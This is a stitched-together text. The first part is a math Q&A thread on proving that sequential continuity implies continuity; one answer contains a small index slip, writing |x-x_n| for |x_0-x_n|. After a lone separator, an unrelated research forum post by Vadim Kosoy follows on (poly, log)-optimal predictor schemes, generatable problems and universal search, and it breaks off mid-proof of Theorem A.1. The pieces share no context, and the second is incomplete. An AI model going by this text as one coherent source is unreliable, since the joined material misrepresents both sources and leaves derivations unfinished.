Let $\lim_{n \to \infty} f(x_n) = f(x)$ for all sequences $\{ x_n \}$ such that $\lim_{n \to \infty} x_n = x$. I am trying to prove that $f$ is continuous.
I know that for all $\varepsilon > 0$ there exists $N \in \mathbb{N}$ such that $|f(x) - f(x_n)| < \varepsilon$ for all $n \ge N$. I also know that there exists $\delta > 0$ such that $|x - x_n| < \delta$ for all $n \in \mathbb{N}$, since a convergent sequence is bounded.
But I need to find a number $\delta > 0$ such that $|f(x) - f(x_0)| < \varepsilon$, if $|x - x_0| < \delta$. For any sequence $\{ x_n \}$ there will be an $x_0 \notin \{ x_n \}$ such that $|x - x_0| < \delta$, since the reals are not countable. I guess I need to show that any $x_0$ belongs to some sequence that converges to $x$ and that satisfies $|x - x_0| < \delta$. Is this the correct approach or am I missing something?
marked as duplicate by Guy Fsone, Cameron Williams, Martin R, Community♦Jan 31 '18 at 20:09
HINT: you can use the contrapositive statement to prove the result, that is, showing that $A\implies B$ is equivalent to show that $\lnot B\implies\lnot A$.
Let $S:=\{(x_n):x_n\in{\rm dom}(f)\text{ and }\lim x_n=x\}$. In this case it means that showing that
$$\forall(x_n)\in S: \lim f(x_n)=f(x)\implies f\text{ is continuous at }x$$
is equivalent to show that
$$f\text{ is not continuous at }x\implies\exists(x_n)\in S:\lim f(x_n)\neq f(x)$$
Suppose that $f$ is discontinuous at $x_0$. Then there is a $\varepsilon>0$ such that, for each $\delta>0$, there is a number $x$ such that $|x-x_0|<\delta$ and $\bigl|f(x)-f(x_0)\bigr|\geqslant\varepsilon$. In particular, for each $n\in\mathbb N$, there is a $x_n$ such that $|x-x_n|<\frac1n$ and that $\bigl|f(x_n)-f(x_0)\bigr|\geqslant\varepsilon$. So, $\lim_{n\to\infty}x_n=x_0$, but $\lim_{n\to\infty}f(x_n)\neq f(x_0)$.
Suppose by contradiction that $f(x)\not\rightarrow f(x_0)$ as $x\rightarrow x_0$. Then, there exists $\varepsilon>0$ such that for every $\delta>0$ there exists $x\in(x_0-\delta,x_0+\delta)$ such that $|f(x)-f(x_0)|>\varepsilon$.
We use this to construct a sequence that convergence to $x_0$:
For $\delta=1$ there exists $x_1\in (x_0-1,x_0+1)$ such that $|f(x_0)-f(x_1)|>\varepsilon$.
For $\delta=\frac{1}{2}$ there exists $x_2\in(x_0-\frac{1}{2},x_0+\frac{1}{2})$ such that $|f(x_0)-f(x_2)|>\varepsilon$.
Continue this way...
For $\delta = \frac{1}{n}$ there exists $x_n\in(x_0-\frac{1}{n},x_0+\frac{1}{n})$ such that $|f(x_0)-f(x_n)|>\varepsilon$.
Now $|x_0-x_n|<\frac{1}{n}\rightarrow 0$ as $n\rightarrow\infty$, therefore $x_n\rightarrow x_0$ But, $|f(x_0)-f(x_n)|>\varepsilon$ for every $n\in\mathbb{N}$ this contradicts the assumption.
|
post by Vadim Kosoy 1055 days ago | Nate Soares likes this | 2 comments
We introduce a variant of optimal predictor schemes where optimality holds within the space of random algorithms with logarithmic advice. These objects are also guaranteed to exist for the error space $$\Delta_{avg}^2$$. We introduce the class of generatable problems and construct a uniform universal predictor scheme for this class which is optimal in the new sense with respect to the $$\Delta^2_{avg}$$ error space. This is achieved by a construction similar to Levin’s universal search.
# New notation
Given $$n \in {\mathbb{N}}$$, $$ev_n: {\mathbb{N}}\times {{\{ 0, 1 \}^*}}^{n+1} \xrightarrow{alg} {{\{ 0, 1 \}^*}}$$ is the following algorithm. When $$ev_n^k(Q,x_1 \ldots x_n)$$ is computed, $$Q$$ is interpreted as a program and $$Q(x_1 \ldots x_n)$$ is executed for time $$k$$. The resulting output is produced.
The notation $$ev^k(Q,x_1 \ldots x_n)$$ means $$ev_n^k(Q,x_1 \ldots x_n)$$.
$$\beta: {{\{ 0, 1 \}^*}}\rightarrow [0,1]$$ is the mapping from a binary expansion to the corresponding real number.
Given $$\mu$$ a word ensemble, $$X$$ a set, $$Q: {{\{ 0, 1 \}^*}}^2 \xrightarrow{alg} X$$, $$T_Q^{\mu}(k,s)$$ stands for the maximal runtime of $$Q(x,y)$$ for $$x \in \operatorname{supp}\mu^k$$, $$y \in {{\{ 0, 1 \}^{s}}}$$.
Previous posts focused on prediction of distributional decision problems, which is the “computational uncertainty” analogue of probability. Here, we use the broader concept of predicting distributional estimation problems (functions), which is analogous to expectation value.
# Definition 1
A distributional estimation problem is a pair $$(f, \mu)$$ where $$f: {{\{ 0, 1 \}^*}}\rightarrow [0,1]$$ is an arbitrary function (even irrational values are allowed) and $$\mu$$ is a word ensemble.
# Definition 2
Given an appropriate set $$X$$, consider $$P: {\mathbb{N}}^2 \times {{\{ 0, 1 \}^*}}^3 \xrightarrow{alg} X$$, $$r: {\mathbb{N}}^2 \rightarrow {\mathbb{N}}$$ polynomial and $$a: {\mathbb{N}}^2 \rightarrow {{\{ 0, 1 \}^*}}$$. The triple $$(P, r, a)$$ is called an $$X$$-valued $$(poly, log)$$-bischeme when
1. The runtime of $$P(k, j, x, y, z)$$ is bounded by $$p(k, j)$$ with $$p$$ polynomial.
2. $$|a(k,j)| \leq c_1 + c_2 \log (k+1) + c_3 \log (j+1)$$ for some $$c_1,c_2,c_3 \in {\mathbb{N}}$$.
A $$[0,1]$$-valued $$(poly, log)$$-bischeme will also be called a $$(poly, log)$$-predictor scheme.
We think of $$P$$ as a random algorithm where the second word parameter represents its internal coin tosses. The third word parameter represents the advice and we usually substitute $$a$$ there.
We will use the notations $$P^{kj}(x,y,z):=P(k,j,x,y,z)$$, $$a^{kj}:=a(k,j)$$.
# Definition 3
Fix $$\Delta$$ an error space of rank 2 and $$(f, \mu)$$ a distributional estimation problem. Consider $$(P, r, a)$$ a $$(poly, log)$$-predictor scheme. $$(P, r, a)$$ is called a $$\Delta(poly, log)$$-optimal predictor scheme for $$(f,\mu)$$ when for any $$(poly, log)$$-predictor scheme $$(Q,s,b)$$, there is $$\delta \in \Delta$$ s.t.
$E_{\mu^k \times U^{r(k,j)}}[(P^{kj}(x,y,a^{kj})-f(x))^2] \leq E_{\mu^k \times U^{s(k,j)}}[(Q^{kj}(x,y,b^{kj})-f(x))^2] + \delta(k,j)$
# Note 1
The notation $$(poly, log)$$ is meant to remind us that we allow a polynomial quantity of random bits $$r(k,j)$$ and a logarithmic quantity of advice $$|a^{kj}|$$. In fact, the definitions and some of the theorems can be generalized to other quantities of random and advice (see also Note B.1). Thus, predictor schemes from previous posts are $$(poly,poly)$$-predictor schemes, $$(poly,O(1))$$-predictor schemes are limited to O(1) advice, $$(log,0)$$-predictor schemes use a logarithmic number of random bits and no advice and so on. As usual in complexity theory, it is redundant to consider more advice than random since advice is strictly more powerful.
$$\Delta(poly, log)$$-optimal predictor scheme satisfy properties analogical to $$\Delta$$-optimal predictor schemes. These properties are listed in Appendix A. The proofs of Theorem A.1 and A.4 are given in Appendix B. The other proofs are straightforward adaptions of corresponding proofs with polynomial advice.
We also have the following existence result:
# Theorem 1
Consider $$(f,\mu)$$ a distributional estimation problem. Define $$\Upsilon: {\mathbb{N}}^2 \times {{\{ 0, 1 \}^*}}^3 \xrightarrow{alg} [0,1]$$ by
$\Upsilon^{kj}(x,y,Q) := \beta(ev^j(Q,x,y))$
Define $$\upsilon_{f,\mu}: {\mathbb{N}}^2 \rightarrow {{\{ 0, 1 \}^*}}$$ by
$\upsilon_{f,\mu}^{kj}:={\underset{|Q| \leq \log j}{\operatorname{arg\,min}}\,} E_{\mu^k \times U^j}[(\Upsilon^{kj}(x,y,Q)-f(x))^2]$
Then, $$(\Upsilon, j, \upsilon_{f,\mu})$$ is a $$\Delta_{avg}^2(poly, log)$$-optimal predictor scheme for $$(f,\mu)$$.
# Note 2
Consider a distributional decision problem $$(D, \mu)$$. Assume $$(D, \mu)$$ admits $$n \in {\mathbb{N}}$$, $$A: {\mathbb{N}}\times {{\{ 0, 1 \}^*}}^3 \xrightarrow{alg} \{0,1\}$$, $$a: {\mathbb{N}}\rightarrow {{\{ 0, 1 \}^*}}$$ and a function $$r: {\mathbb{N}}\rightarrow {\mathbb{N}}$$ s.t.
1. $$A(k,x,y,z)$$ runs in quasi-polynomial time ($$O(2^{\log^n k})$$).
2. $|a(k)| = O(\log^n k)$
3. ${\lim_{k \rightarrow \infty}{Pr_{\mu^k \times U^{r(k)}}[A(k,x,y,a(k)) \neq \chi_D(x)]}} = 0$
Then it is easy to see we can construct a $$(poly,log)$$-predictor scheme $$P_A$$ taking values in $$\{0,1\}$$ s.t. $$E[(P_A-f)^2] \in \Delta_{avg}^2$$. The implication doesn’t work for larger sizes of time or advice. Therefore, the uncertainty represented by $$\Delta_{avg}^2(poly,log)$$-optimal predictor schemes is associated with the resource gap between quasi-polynomial time plus advice $$O(\log^n k)$$ and the resources needed to (heuristically) solve the problem in question.
The proof of Theorem 1 is given in Appendix C: it is a straightforward adaptation of the corresponding proof for polynomial advice. Evidently, the above scheme is non-uniform. We will now describe a class of problems which admits uniform $$\Delta_{avg}^2(poly, log)$$-optimal predictor schemes.
# Definition 4
Consider $$\Delta^1$$ an error space of rank 1. A word ensemble $$\mu$$ is called $$\Delta^1(log)$$-sampleable when there is $$S: {\mathbb{N}}\times {{\{ 0, 1 \}^*}}^2 \xrightarrow{alg} {{\{ 0, 1 \}^*}}$$ that runs in polynomial time in the 1st argument, $$a^S: {\mathbb{N}}\rightarrow {{\{ 0, 1 \}^*}}$$ of logarithmic size and $$r^S: {\mathbb{N}}\rightarrow {\mathbb{N}}$$ a polynomial such that
$\sum_{x \in {{\{ 0, 1 \}^*}}} |\mu^k(x) - Pr_{U^{r^S(k)}}[S^k(y,a^S(k))=x]| \in \Delta^1$
$$(S, r^S, a^S)$$ is called a $$\Delta^1(log)$$-sampler for $$\mu$$.
# Definition 5
Consider $$\Delta^1$$ an error space of rank 1. A distributional estimation problem $$(f, \mu)$$ is called $$\Delta^1(log)$$-generatable when there are $$S: {\mathbb{N}}\times {{\{ 0, 1 \}^*}}^2 \xrightarrow{alg} {{\{ 0, 1 \}^*}}$$ and $$F: {\mathbb{N}}\times {{\{ 0, 1 \}^*}}^2 \xrightarrow{alg} [0,1]$$ that run in polynomial time in the 1st argument, $$a^S: {\mathbb{N}}\rightarrow {{\{ 0, 1 \}^*}}$$ of logarithmic size and $$r^S: {\mathbb{N}}\rightarrow {\mathbb{N}}$$ a polynomial such that
1. $$(S, r^S, a^S)$$ is a $$\Delta^1(log)$$-sampler for $$\mu$$.
2. $E_{U^{r^S(k)}}[(F^k(y,a^S(k))-f(S^k(y,a^S(k))))^2] \in \Delta^1$
$$(S, F, r^S, a^S)$$ is called a $$\Delta^1(log)$$-generator for $$(f, \mu)$$.
When $$a^S$$ is the empty string, $$(S,F,r^S)$$ is called a $$\Delta^1(0)$$-generator for $$(f, \mu)$$. Such $$(f, \mu)$$ is called $$\Delta^1(0)$$-generatable.
# Note 3
The class of $$\Delta^1(0)$$-generatable problems can be regarded as an average-case analogue of $$NP \cap coNP$$. If $$f$$ is a decision problem (i.e. its range is $$\{0,1\}$$), words $$y \in {{\{ 0, 1 \}^{r^S(k)}}}$$ s.t. $$S^k(y)=x$$, $$F^k(y)=1$$ can be regarded as “proofs” of $$f(x)=1$$ and words $$y \in {{\{ 0, 1 \}^{r^S(k)}}}$$ s.t. $$S^k(y)=x$$, $$F^k(y)=0$$ can be regarded as “proofs” of $$f(x)=0$$.
# Theorem 2
There is an oracle machine $$\Lambda$$ that accepts an oracle of signature $$SF: {\mathbb{N}}\times {{\{ 0, 1 \}^*}}\rightarrow {{\{ 0, 1 \}^*}}\times [0,1]$$ and a polynomial $$r: {\mathbb{N}}\rightarrow {\mathbb{N}}$$ where the allowed oracle calls are $$SF^k(x)$$ for $$|x|=r(k)$$ and computes a function of signature $${\mathbb{N}}^2 \times {{\{ 0, 1 \}^*}}^2 \rightarrow [0,1]$$ s.t. for any $$(f, \mu)$$ a distributional estimation problem and $$G:=(S, F, r^S, a^S)$$ a corresponding $$\Delta_0^1(log)$$-generator, $$\Lambda[G]$$ is a $$\Delta_{avg}^2(poly,log)$$-optimal predictor scheme for $$(f,\mu)$$.
In particular if $$(f,\mu)$$ is $$\Delta_0^1(0)$$-generatable, we get a uniform $$\Delta_{avg}^2(poly,log)$$-optimal predictor scheme.
The following is the description of $$\Lambda$$. Consider $$SF: {\mathbb{N}}\times {{\{ 0, 1 \}^*}}\rightarrow {{\{ 0, 1 \}^*}}\times [0,1]$$ and a polynomial $$r: {\mathbb{N}}\rightarrow {\mathbb{N}}$$. We describe the computation of $$\Lambda[SF,r]^{kj}(x)$$ where the extra argument of $$\Lambda$$ is regarded as internal coin tosses.
We loop over the first $$j$$ words in lexicographic order. Each word is interpreted as a program $$Q: {{\{ 0, 1 \}^*}}^2 \xrightarrow{alg} [0,1]$$. We loop over $$jk$$ “test runs”. At test run $$i$$, we generate $$(x_i \in {{\{ 0, 1 \}^*}}, t_i \in [0,1])$$ by evaluating $$SF^k(y_i)$$ for $$y_i$$ sampled from $$U^{r(k)}$$. We then sample $$z_i$$ from $$U^j$$ and compute $$s_i:=ev^{j}(Q,x_i,z_i)$$. At the end of the test runs, we compute the average error $$\epsilon(Q):=\frac{1}{jk}\sum_{i} (s_i - t_i)^2$$. At the end of the loop over programs, the program $$Q^*$$ with the lowest error is selected and the output $$ev^{j}(Q^*,x)$$ is produced.
The proof that this construction is $$\Delta_{avg}^2(poly,log)$$-optimal is given in Appendix C.
## Appendix A
Fix $$\Delta$$ an error space of rank 2.
# Theorem A.1
Suppose there is a polynomial $$h: {\mathbb{N}}^2 \rightarrow {\mathbb{N}}$$ s.t. $$h^{-1} \in \Delta$$. Consider $$(f, \mu)$$ a distributional estimation problem and $$(P,r,a)$$ a $$\Delta(poly,log)$$-optimal predictor scheme for $$(f, \mu)$$. Suppose $$\{p_{kj} \in [0,1]\}_{k,j \in {\mathbb{N}}}$$, $$\{q_{kj} \in [0,1]\}_{k,j \in {\mathbb{N}}}$$ are s.t.
$\exists \epsilon > 0 \; \forall k,j: (\mu^k \times U^{r(k,j)})\{(x,y) \in {{\{ 0, 1 \}^*}}^2 \mid p_{kj} \leq P^{kj}(x,y,a^{kj}) \leq q_{kj}\} \geq \epsilon$
Define
$\phi_{kj} := {E_{\mu^k \times U^{r(k,j)}}[f(x)-P^{kj}(x,y,a^{kj}) \mid p_{kj} \leq P^{kj}(x,y,a^{kj}) \leq q_{kj}]}$
Assume that either $$p_{kj}, q_{kj}$$ have a number of digits logarithmically bounded in $$k,j$$ or $$P^{kj}$$ produces outputs with a number of digits logarithmically bounded in $$k,j$$ (by Theorem A.7 if any $$\Delta(poly,log)$$-optimal predictor scheme exists for $$(f, \mu)$$ then a $$\Delta(poly,log)$$-optimal predictor scheme with this property exists as well). Then, $$|\phi| \in \Delta$$.
# Theorem A.2
Consider $$\mu$$ a word ensemble and $$f_1, f_2: {{\{ 0, 1 \}^*}}\rightarrow [0,1]$$ s.t. $$f_1 + f_2 \leq 1$$. Suppose $$(P_1,r_1,a_1)$$ is a $$\Delta(poly,log)$$-optimal predictor scheme for $$(f_1, \mu)$$ and $$(P_2,r_2,a_2)$$ is a $$\Delta(poly,log)$$-optimal predictor scheme for $$(f_2, \mu)$$. Define $$P: {\mathbb{N}}^2 \times {{\{ 0, 1 \}^*}}^3 \xrightarrow{alg} [0,1]$$ by $$P^{kj}(x, y_1 y_2, (z_1, z_2)):=\eta(P^{kj}_1(x,y_1,z_1) + P^{kj}_2(x,y_2,z_2))$$ for $$|y_i|=r_i(k,j)$$. Then, $$(P,r_1+r_2,a_1 a_2)$$ is a $$\Delta(poly,log)$$-optimal predictor scheme for $$(f_1 + f_2, \mu)$$.
# Theorem A.3
Consider $$\mu$$ a word ensemble and $$f_1, f_2: {{\{ 0, 1 \}^*}}\rightarrow [0,1]$$ s.t. $$f_1 + f_2 \leq 1$$. Suppose $$(P_1,r_1,a_1)$$ is a $$\Delta(poly,log)$$-optimal predictor scheme for $$(f_1, \mu)$$ and $$(P,r_2,a_2)$$ is a $$\Delta(poly,log)$$-optimal predictor scheme for $$(f_1 + f_2, \mu)$$. Define $$P_2: {\mathbb{N}}^2 \times {{\{ 0, 1 \}^*}}^3 \xrightarrow{alg} [0,1]$$ by $$P^{kj}_2(x, y_1 y_2, (z_1, z_2)):=\eta(P^{kj}(x,y_1,z_1) - P^{kj}_1(x,y_2,z_2))$$ for $$|y_i|=r_i(k,j)$$. Then, $$(P_2,r_1+r_2,a_1 a_2)$$ is a $$\Delta(poly,log)$$-optimal predictor scheme for $$(f_2, \mu)$$.
# Theorem A.4
Fix $$\Delta^1$$ an error space of rank 1 s.t. given $$\delta^1 \in \Delta^1$$, the function $$\delta(k,j):=\delta^1(k)$$ lies in $$\Delta$$. Consider $$(f_1, \mu_1)$$, $$(f_2, \mu_2)$$ distributional estimation problems with respective $$\Delta(poly,log)$$-optimal predictor schemes $$(P_1,r_1,a_1)$$ and $$(P_2,r_2,a_2)$$. Assume $$\mu_1$$ is $$\Delta^1(log)$$-sampleable and $$(f_2, \mu_2)$$ is $$\Delta^1(log)$$-generatable. Define $$f_1 \times f_2: {{\{ 0, 1 \}^*}}\rightarrow [0,1]$$ by $$(f_1 \times f_2)(x_1,x_2)=f_1(x_1) f_2(x_2)$$ and $$(f_1 \times f_2)(y)=0$$ for $$y$$ not of this form. Define $$P: {\mathbb{N}}^2 \times {{\{ 0, 1 \}^*}}^3 \xrightarrow{alg} [0,1]$$ by $$P^{kj}((x_1,x_2), y_1 y_2, (z_1, z_2)):=P^{kj}_1(x_1,y_1,z_1) P^{kj}_2(x_2,y_2,z_2)$$ for $$|y_i|=r_i(k,j)$$. Then, $$(P,r_1 + r_2,(a_1,a_2))$$ is a $$\Delta(poly,log)$$-optimal predictor scheme for $$(f_1 \times f_2, \mu_1 \times \mu_2)$$.
# Theorem A.5
Consider $$f: {{\{ 0, 1 \}^*}}\rightarrow [0,1]$$, $$D \subseteq {{\{ 0, 1 \}^*}}$$ and $$\mu$$ a word ensemble. Assume $$(P_D,r_D,a_D)$$ is a $$\Delta(poly,log)$$-optimal predictor scheme for $$(D, \mu)$$ and $$(P_{f \mid D},r_{f \mid D},a_{f \mid D})$$ is a $$\Delta(poly,log)$$-optimal predictor scheme for $$(f, \mu \mid D)$$. Define $$P: {\mathbb{N}}^2 \times {{\{ 0, 1 \}^*}}^3 \xrightarrow{alg} [0,1]$$ by $$P^{kj}(x, y_1 y_2, (z_1, z_2)):=P^{kj}_D(x,y_1,z_1) P^{kj}_{f \mid D}(x,y_2,z_2)$$ for $$|y_i|=r_i(k,j)$$. Then $$(P, r_D+r_{f \mid D},(a_D, a_{f \mid D}))$$ is a $$\Delta(poly,log)$$-optimal predictor scheme for $$(\chi_D f, \mu)$$.
# Theorem A.6
Fix $$h$$ a polynomial s.t. $$2^{-h} \in \Delta$$. Consider $$f: {{\{ 0, 1 \}^*}}\rightarrow [0,1]$$, $$D \subseteq {{\{ 0, 1 \}^*}}$$ and $$\mu$$ a word ensemble. Assume $$\exists \epsilon > 0 \; \forall k: \mu^k(D) \geq \epsilon$$. Assume $$(P_D,r_D,a_D)$$ is a $$\Delta(poly,log)$$-optimal predictor scheme for $$(D, \mu)$$ and $$(P_{\chi_D f},r_{\chi_D f},a_{\chi_D f})$$ is a $$\Delta(poly,log)$$-optimal predictor scheme for $$(\chi_D f, \mu)$$. Define $$P_{f \mid D}: {\mathbb{N}}^2 \times {{\{ 0, 1 \}^*}}^3 \xrightarrow{alg} [0,1]$$ by
$P^{kj}_{f \mid D}(x,y_1 y_2, (z_1, z_2)) := \begin{cases}1 & \text{if } P^{kj}_D(x,y_2,z_2) = 0 \\ \eta(\frac{P^{kj}_{\chi_D f}(x,y_1,z_1)}{P^{kj}_D(x,y_2,z_2)}) & \text{rounded to }h(k,j)\text{ binary places if } P^{kj}_D(x,y_2,z_2) > 0 \end{cases}$
Then, $$(P_{f \mid D},r_D+r_{\chi_D f},(a_{\chi_D f}, a_D))$$ is a $$\Delta(poly,log)$$-optimal predictor scheme for $$(f, \mu \mid D)$$.
# Definition A.1
Consider $$\mu$$ a word ensemble and $$\hat{Q}_1:=(Q_1,s_1,b_1)$$, $$\hat{Q}_2:=(Q_2,s_2,b_2)$$ $$(poly,log)$$-predictor schemes. We say $$\hat{Q}_1$$ is $$\Delta$$-similar to $$\hat{Q}_2$$ relative to $$\mu$$ (denoted $$\hat{Q}_1 \underset{\Delta}{\overset{\mu}{\simeq}} \hat{Q}_2$$) when $$E_{\mu^k \times U^{s_1(k,j)} \times U^{s_2(k,j)}}[(Q_1^{kj}(x,y_1,b^{kj}_1)-Q_2^{kj}(x,y_2,b^{kj}_2))^2] \in \Delta$$.
# Theorem A.7
Consider $$(f, \mu)$$ a distributional estimation problem, $$\hat{P}$$ a $$\Delta(poly,log)$$-optimal predictor scheme for $$(f, \mu)$$ and $$\hat{Q}$$ a $$(poly,log)$$-predictor scheme. Then, $$\hat{Q}$$ is a $$\Delta(poly,log)$$-optimal predictor scheme for $$(f, \mu)$$ if and only if $$\hat{P} \underset{\Delta}{\overset{\mu}{\simeq}} \hat{Q}$$.
# Note A.1
$$\Delta$$-similarity is not an equivalence relation on the set of arbitrary $$(poly,log)$$-predictor schemes. However, it is an equivalence relation on the set of $$(poly,log)$$-predictor schemes $$\hat{Q}$$ satisfying $$\hat{Q} \underset{\Delta}{\overset{\mu}{\simeq}} \hat{Q}$$ (i.e. the $$\mu$$-expectation value of the intrinsic variance of $$\hat{Q}$$ is in $$\Delta$$). In particular, for any $$f: {{\{ 0, 1 \}^*}}\rightarrow [0,1]$$ any $$\Delta(poly,log)$$-optimal predictor scheme for $$(f,\mu)$$ has this property.
# Definition B.1
Given $$n \in {\mathbb{N}}$$, a function $$\delta: {\mathbb{N}}^{2+n} \rightarrow {\mathbb{R}}^{\geq 0}$$ is called $$\Delta$$-moderate when
1. $$\delta$$ is non-decreasing in arguments $$3$$ to $$2+n$$.
2. For any collection of polynomials $$\{p_i: {\mathbb{N}}^2 \rightarrow {\mathbb{N}}\}_{i < n}$$, $$\delta(k, j, p_0(k,j) \ldots p_{n-1}(k,j)) \in \Delta$$
# Lemma B.1
Fix $$(f, \mu)$$ a distributional estimation problem and $$\hat{P}:=(P,r,a)$$ a $$(poly,log)$$-predictor scheme. Then, $$\hat{P}$$ is $$\Delta(poly,log)$$-optimal iff there is a $$\Delta$$-moderate function $$\delta: {\mathbb{N}}^4 \rightarrow [0,1]$$ s.t. for any $$k,j,s \in {\mathbb{N}}$$, $$Q: {{\{ 0, 1 \}^*}}^2 \xrightarrow{alg} [0,1]$$
$E_{\mu^k \times U^{r(k,j)}}[(P^{kj}(x,y,a^{kj})-f(x))^2] \leq E_{\mu^k \times U^s}[(Q(x,y)-f(x))^2] + \delta(k,j,T_Q^{\mu}(k,s),2^{|Q|})$
# Proof of Lemma B.1
Define
$\delta(k,j,t,u):=\max_{\substack{T_Q^{\mu}(k,s) \leq t \\ |Q| \leq \log u}} \{ E_{\mu^k \times U^{r(k,j)}}[(P^{kj}(x,y,a^{kj})-f(x))^2] - E_{\mu^k \times U^s}[(Q(x,y)-f(x))^2] \}$
# Note B.1
Lemma B.1 shows that the error bound for $$\Delta(poly,log)$$-optimal predictor scheme is in some sense uniform with respect to $$Q$$. This doesn’t generalize to e.g. $$\Delta(poly,O(1))$$-optimal predictor schemes. The latter still admit a weaker version of Theorems A.1 and direct analogues of Theorems A.2, A.3, A.5, A.6 and A.7. Theorem A.4 doesn’t seem to generalize.
# Lemma B.2
Suppose there is a polynomial $$h: {\mathbb{N}}^2 \rightarrow {\mathbb{N}}$$ s.t. $$h^{-1} \in \Delta$$. Fix $$(f, \mu)$$ a distributional estimation problem and $$(P,r,a)$$ a corresponding $$\Delta(poly,log)$$-optimal predictor scheme. Consider $$(Q,s,b)$$ a $$(poly,log)$$-predictor scheme, $$M > 0$$, $$w: {\mathbb{N}}^2 \times {{\{ 0, 1 \}^*}}^3 \xrightarrow{alg} {\mathbb{Q}}\cap [0,M]$$ with runtime bounded by a polynomial in the first two arguments, and $$u: {\mathbb{N}}^2 \rightarrow {{\{ 0, 1 \}^*}}$$ of logarithmic size. Then there is $$\delta \in \Delta$$ s.t.
$E_{\mu^k \times U^{\max(r(k,j),s(k,j))}}[w^{kj}(x,y,u^{kj})(P^{kj}(x,y_{\leq r(k,j)},a^{kj})-f(x))^2] \leq E_{\mu^k \times U^{\max(r(k,j),s(k,j))}}[w^{kj}(x,y,u^{kj})(Q^{kj}(x,y_{\leq s(k,j)},b^{kj})-f(x))^2] + \delta(k, j)$
# Proof of Lemma B.2
Given $$t \in [0,M]$$, define $$\alpha^{kj}(t)$$ to be $$t$$ rounded within error $$h(k,j)^{-1}$$. Thus, the number of digits in $$\alpha^{kj}(t)$$ is logarithmic in $$k$$ and $$j$$. Denote $$q(k,j):=\max(r(k,j),s(k,j))$$. Consider $$\hat{Q}_t:=(Q_t, r+s, b_t)$$ the $$(poly,log)$$-predictor scheme defined by
$Q^{kj}_t(x,y,b^{kj}_t):= \begin{cases} Q^{kj}(x,y_{\leq s(k,j)},b^{kj}) & \text{if } w^{kj}(x,y_{\leq q(k,j)},u^{kj}) \geq \alpha^{kj}(t) \\ P^{kj}(x,y_{\leq r(k,j)},a^{kj}) & \text{if } w^{kj}(x,y_{\leq q(k,j)},u^{kj}) < \alpha^{kj}(t) \end{cases}$
$$\hat{Q}_t$$ satisfies bounds on runtime and advice size uniform in $$t$$. Therefore, Lemma B.1 implies that there is $$\delta \in \Delta$$ s.t.
$E_{\mu^k \times U^{r(k,j)}}[(P^{kj}(x,y,a^{kj})-f(x))^2] \leq E_{\mu^k \times U^{r(k,j)+s(k,j)}}[(Q^{kj}_t(x,y,b^{kj})-f(x))^2] + \delta(k, j)$
$E_{\mu^k \times U^{r(k,j)+s(k,j)}}[(P^{kj}(x,y_{\leq r(k,j)},a^{kj})-f(x))^2-(Q^{kj}_t(x,y,b^{kj})-f(x))^2] \leq \delta(k, j)$
$E_{\mu^k \times U^{q(k,j)}}[\theta(w^{kj}(x,y,u^{kj})-\alpha^{kj}(t))((P^{kj}(x,y_{\leq r(k,j)},a^{kj})-f(x))^2-(Q^{kj}(x,y_{\leq s(k,j)},b^{kj})-f(x))^2)] \leq \delta(k, j)$
$E_{\mu^k \times U^{q(k,j)}}[\int_0^M\theta(w^{kj}(x,y,z,u^{kj})-\alpha^{kj}(t))\,dt\,((P^{kj}(x,y_{\leq r(k,j)},a^{kj})-f(x))^2-(Q^{kj}(x,y_{\leq s(k,j)},b^{kj})-f(x))^2)] \leq M \delta(k, j)$
$E_{\mu^k \times U^{q(k,j)}}[w^{kj}(x,y,z,u^{kj})((P^{kj}(x,y_{\leq r(k,j)},a^{kj})-f(x))^2-(Q^{kj}(x,y_{\leq s(k,j)},b^{kj})-f(x))^2)] \leq M \delta(k, j) + h(k,j)^{-1}$
In the following proofs we will use shorthand notations that omit most of the symbols that are clear for the context. That is, we will use $$P$$ to mean $$P^{kj}(x,y,a^{kj})$$, $$f$$ to mean $$f(x)$$, $$E[\ldots]$$ to mean $$E_{\mu^k \times U^r(k,j)}[\ldots]$$ etc.
# Proof of Theorem A.1
Define $$w: {\mathbb{N}}^2 \times {{\{ 0, 1 \}^*}}^3 \xrightarrow{alg} \{0,1\}$$ and $$u: {\mathbb{N}}^2 \rightarrow {{\{ 0, 1 \}^*}}$$ by
$w:=\theta(P-p)\theta(q-P)$
We have
$\phi = \frac{E[w(f-P)]}{E[w]}$
Define $$\psi$$ to be $$\phi$$ truncated to the first significant binary digit. Denote $$I \subseteq {\mathbb{N}}^2$$ the set of $$(k,j)$$ for which $${\lvert \phi_{kj} \rvert} > h(k,j)^{-1}$$. Consider $$(Q,s,b)$$ a $$(poly,log)$$-predictor scheme satisfying
$\forall (k,j) \in I: Q^{kj}=\eta(P^{kj}+\psi_{kj})$
Such $$Q$$ exists since for $$(k,j) \in I$$, $$\psi_{kj}$$ has binary notation of logarithmically bounded size.
Applying Lemma B.2 we get
$\forall (k,j) \in I: E[w^{kj}(P^{kj}-f)^2] \leq E[w^{kj}(Q^{kj}-f)^2] + \delta(k,j)$
for $$\delta \in \Delta$$.
$\forall (k,j) \in I: E[w^{kj}((P^{kj}-f)^2-(Q^{kj}-f)^2)] \leq \delta(k,j)$
$\forall (k,j) \in I: E[w^{kj}((P^{kj}-f)^2-(\eta(P^{kj}+\psi_{kj})-f)^2)] \leq \delta(k,j)$
Obviously $$(\eta(P^{kj}+\psi_{kj})-f)^2 \leq (P^{kj}+\psi_{kj}-f)^2$$, therefore
$\forall (k,j) \in I: E[w^{kj}((P^{kj}-f)^2-(P^{kj}+\psi_{kj}-f)^2)] \leq \delta(k,j)$
$\forall (k,j) \in I: \psi_{kj} E[w^{kj}(2(f-P^{kj})-\psi_{kj})] \leq \delta(k,j)$
The expression on the left hand side is a quadratic polynomial in $$\psi_{kj}$$ which attains its maximum at $$\phi_{kj}$$ and has roots at $$0$$ and $$2\phi_{kj}$$. $$\psi_{kj}$$ is between $$0$$ and $$\phi_{kj}$$, but not closer to $$0$$ than $$\frac{\phi_{kj}}{2}$$. Therefore, the inequality is preserved if we replace $$\psi_{kj}$$ by $$\frac{\phi_{kj}}{2}$$.
$\forall (k,j) \in I: \frac{\phi_{kj}}{2}E[w^{kj}(2(f-P^{kj})-\frac{\phi_{kj}}{2})] \leq \delta(k,j)$
Substituting the equation for $$\phi_{kj}$$ we get
$\forall (k,j) \in I: \frac{1}{2}\frac{E[w^{kj}(f-P^{kj})]}{E[w^{kj}]}E[w^{kj}(2(f-P^{kj})-\frac{1}{2}\frac{E[w^{kj}(f-P^{kj})]}{E[w^{kj}]})] \leq \delta(k,j)$
